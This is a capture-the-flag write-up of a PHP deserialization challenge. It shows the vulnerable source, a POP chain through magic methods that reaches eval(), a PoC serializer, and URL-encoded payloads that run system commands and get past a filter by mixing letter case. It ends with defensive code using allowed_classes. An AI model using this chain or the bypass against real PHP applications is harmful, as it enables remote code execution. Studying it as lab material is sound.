CTF-easy_php

Preface

While solving challenges in a competition I came across one very similar to NISACTF2022 babyserialize, so I'm writing it up here.

Challenge

<?php
include "waf.php";
class CTF{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class love{
    public $ext;
    public $x;
    public function __wakeup(){
        die("Maybe it failed?");
    }
    public function __destruct(){
        $this->ext->ZZU_ctf_is_fun($this->x);
    }
}

class Ilovectf{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="please_don't_copy";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if($this->fun=md5($this->fun)){
            strtoupper($this->a);
        }
    }
}


if(isset($_GET['unser'])){
    @unserialize($_GET['unser']);
}else{
    highlight_file(__FILE__);
}

?>

This is PHP deserialization; clearly the goal is to build a POP chain that reaches the eval() call, with its argument being the command we want to run.

POP chain

love::__destruct -> Ilovectf::__call -> four::__set -> Ilovectf::__toString -> CTF::__invoke

Step by step: love::__destruct calls the undefined method ZZU_ctf_is_fun() on $ext, so with $ext set to an Ilovectf object this lands in Ilovectf::__call. That method writes $this->huang->fun; with $huang set to a four object, whose $fun is private, the write from outside the class triggers four::__set. Inside __set the assignment $this->fun=md5(...) is always truthy, so strtoupper($this->a) runs and coerces $a to a string; with $a pointing back at the Ilovectf object this invokes Ilovectf::__toString, which calls $su as a function, and with $su set to a CTF object that triggers CTF::__invoke and the eval().

PoC

<?php
class CTF{
    public $fun="show_me_flag";
    public $txw4ever;
}
class love{
    public $ext;
    public $x;
}
class Ilovectf{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun;
}
$ct = new CTF();
$ct->txw4ever = "sYstem('ls /');"; # PHP function names are case-insensitive, which bypasses the filter
$b = new love();
$att = new Ilovectf();
$b->ext = $att;
$b->x = "1e3"; # any value works as long as its md5 is not 0
$c = new four();
$att->huang = $c;
$c->a = $att;
$att->su = $ct;
echo urlencode(serialize($b));
?>

Strangely, after sending the parameter, love::__wakeup was not triggered (it clearly was triggered on my own server... could someone more experienced explain this?)

payload

?unser=O%3A4%3A%22love%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovectf%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A3%3A%22CTF%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A12%3A%22show_me_flag%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A13%3A%22sYstem%28%27ls%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3Bs%3A3%3A%221e3%22%3B%7D

Result:

Change the command to sYstem('cat /fllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6')

The payload is as follows:

?unser=O%3A4%3A"love"%3A2%3A%7Bs%3A3%3A"ext"%3BO%3A8%3A"Ilovectf"%3A2%3A%7Bs%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A%7Bs%3A1%3A"a"%3Br%3A2%3Bs%3A9%3A"%00four%00fun"%3BN%3B%7Ds%3A2%3A"su"%3BO%3A3%3A"CTF"%3A2%3A%7Bs%3A3%3A"fun"%3Bs%3A12%3A"show_me_flag"%3Bs%3A8%3A"txw4ever"%3Bs%3A64%3A"sYstem%28%27cat+%2Ffllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6%27%29%3B"%3B%7D%7Ds%3A1%3A"x"%3Bs%3A3%3A"1e3"%3B%7D

Result: flag{It_is_tmd_easy_php_orz}
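As an added note for defenders (example code written for this write-up, not part of the original challenge or its author's code): the whole chain above depends on unserialize() instantiating the real love/Ilovectf/four/CTF classes so that their magic methods can fire. Passing allowed_classes => false turns every object in the input into a __PHP_Incomplete_Class, which has no __wakeup, __destruct, __call, __toString or __invoke, so the chain never starts. The serialized string below is a constructed, shortened version of the payload structure, used only as sample input.

```php
<?php
// Constructed sample input: a "love" object whose ext is an "Ilovectf" object,
// mirroring the outer layers of the chain without the inner four/CTF objects.
$untrusted = 'O:4:"love":2:{s:3:"ext";O:8:"Ilovectf":2:{s:5:"huang";N;s:2:"su";N;}s:1:"x";s:3:"1e3";}';

// Deserialize without ever instantiating application classes.
// With allowed_classes => false (PHP 7.0+) every O:... token becomes a
// __PHP_Incomplete_Class, so no magic method of love/Ilovectf/four/CTF can run.
function safe_unserialize(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        return null; // malformed or truncated input
    }
    return $value;
}

// Returns true if the decoded value contains any object at all, so the caller
// can reject it: legitimate data here is expected to be scalars and arrays only.
function contains_object($value): bool
{
    if (is_object($value)) {
        // Includes __PHP_Incomplete_Class produced by allowed_classes => false.
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

$result = safe_unserialize($untrusted);
if ($result === null || contains_object($result)) {
    // The payload is neutralized (top-level value is a __PHP_Incomplete_Class)
    // and rejected before any application code touches it.
    echo "rejected untrusted serialized object\n";
} else {
    echo "accepted plain data\n";
}
// If request data only ever needs scalars and arrays, carry it as JSON
// (json_decode) and never call unserialize() on user input at all.
```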

Conclusion

I think this challenge mainly tests PHP magic methods and language quirks (I never thought of the upper/lower-case bypass and kept swapping functions around instead; I'm bad at this...)
